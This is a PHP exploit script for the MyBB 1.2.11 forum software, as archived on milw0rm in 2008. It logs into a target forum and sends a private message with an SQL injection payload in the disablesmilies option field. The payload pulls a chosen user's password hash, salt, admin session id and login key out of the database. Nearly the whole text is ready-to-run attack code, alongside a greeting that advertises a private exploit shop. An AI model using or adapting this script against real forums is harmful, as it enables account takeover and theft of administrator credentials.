mybb 1.2.11 xek

',(select+username+from+mybb_users+where+uid=4),(select+password+from+mybb_users+where+uid=4),(select+salt+from+mybb_users+where+uid=4),admin_sid',(select+sid+from+mybb_adminsessions+where+uid=4),'admin_loginkey',(select+loginkey+from+mybb_adminsessions+where+uid=4)),1121512515,null,null,'yes',null,null)/*&action=do_send // // greets all https://forum.antichat.ru :) b00zy/br 32sm. <====3 oO :P ( .)(. ) :D :| root@dblaine#cat /dev/legs > /dev/mouth // and http://expdb.cc/?op=expdb /welcome to our priv8 exploits shop, greetz to all it's members/* // 25.01.08 error_reporting(0); @ini_set("max_execution_time",0); @ini_set('output_buffering',0); @set_magic_quotes_runtime(0); @set_time_limit(0); @ob_implicit_flush(1); header("Content-Type: text/html; charset=utf-8\r\n"); header("Pragma: no-cache"); ?> mybb 1.2.11 xek

¬ for expamle "expdb.cc"
¬ patch 2 mybb forum, for expamle "community/mybb"
¬ you username on this forum, for expamle "c411k"
¬ you password, for expamle "h1world"
¬ admin id, default 1
'; } if (isset($_GET['fuck_mybb'])) { $username = ($_POST['username']); $pwd = ($_POST['pwd']); $host_mybb = ($_POST['hostname']); $patch_mybb = ($_POST['patch']); $uid_needed = ($_POST['uid_needed']); $login_mybb = 'member.php'; $pm_mybb = 'private.php'; $data_login = 'username='.$username.'&password='.$pwd.'&submit=Login&action=do_login&url=http%3A%2F%2Flocalhost%2Fmybb_1210%2Findex.php'; function sendd($host, $patch, $scr_nm, $method, $data_gp, $cook1e) { global $send_http; $s = array(); $url = fsockopen($host, 80); $send_http = "$method http://$host/$patch/$scr_nm HTTP/1.1\r\n"; $send_http .= "Host: $host\r\n"; $send_http .= "User-Agent: Mozilla/5.0 (oO; U; oO zzzz bzzzz brrr trrr; ru; rv:1.8.1.4) Gecko/20180515 Firefox/1.3.3.7\r\n"; $send_http .= "Cookie: $cook1e\r\n"; $send_http .= "Content-Type: application/x-www-form-urlencoded\r\n"; $send_http .= "Content-Length: ".strlen($data_gp)."\r\n"; $send_http .= "Connection: Close\r\n\r\n"; if ($method === 'POST') { $send_http .= $data_gp; } //print_r($send_http); fputs($url, $send_http); while (!feof($url)) $s[] = fgets($url, 1028); fclose($url); return $s; } echo '

- start....';
myflush(50000);

$get_cookie = sendd($host_mybb, $patch_mybb, $login_mybb, 'POST', $data_login, 'fuckkk');
echo '- login '.$username.' with passwd = '.$pwd.' done';
myflush(50000);

foreach ($get_cookie as $value)
{
	if (strpos($value, 'Set-Cookie: mybbuser=') !== false)
	{
		$value = explode(";", $value);
		$cookie = strstr($value[0], 'mybbuser');
		break;
	}
}
echo '- cookie: '.$cookie;
myflush(50000);

preg_match("/mybbuser=(.*)_/", $cookie, $m);
$get_uid = $m[1];
echo '- user id: '.$get_uid;
myflush(50000);

$data_expl = "to=$username&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),($get_uid,$get_uid,$get_uid,1,'with+<3+from+antichat.ru',9,concat_ws(0x3a,'username:password:salt+>',(select+username+from+mybb_users+where+uid=$uid_needed),(select+password+from+mybb_users+where+uid=$uid_needed),(select+salt+from+mybb_users+where+uid=$uid_needed),' admin sid',(select+sid+from+mybb_adminsessions+where+uid=$uid_needed),' admin loginkey',(select+loginkey+from+mybb_adminsessions+where+uid=$uid_needed)),1121512515,null,null,'yes',null,null)/*&action=do_send";
sendd($host_mybb, $patch_mybb, $pm_mybb, 'POST', $data_expl, $cookie);
echo '- send exploit:
-------------------
'.$send_http.'
-------------------
look you private messages 4 admin passwd hash http://'.$host_mybb.'/'.$patch_mybb.'/'.$pm_mybb.'';
}


?>




# milw0rm.com [2008-08-26]